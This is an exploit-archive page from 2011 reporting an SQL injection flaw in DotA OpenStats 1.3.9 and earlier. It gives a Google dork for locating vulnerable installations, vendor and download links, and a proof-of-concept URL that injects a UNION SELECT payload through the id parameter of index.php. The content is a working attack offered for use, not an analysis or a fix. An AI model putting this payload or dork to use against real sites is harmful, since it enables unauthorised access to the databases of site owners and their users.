DotA OpenStats <= 1.3.9 SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DotA OpenStats <= 1.3.9 SQL Injection
# Published : 2011-12-19
# Author :
# Previous Title : Wordpress Count-per-day plugin Multiple Vulnerabilities
# Next Title : PhpBridges Blog System members.php SQL Injection

=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "? 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit
		
		http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
		
============
Made IN INDONESIA
Greetz for All HVM crew :)
============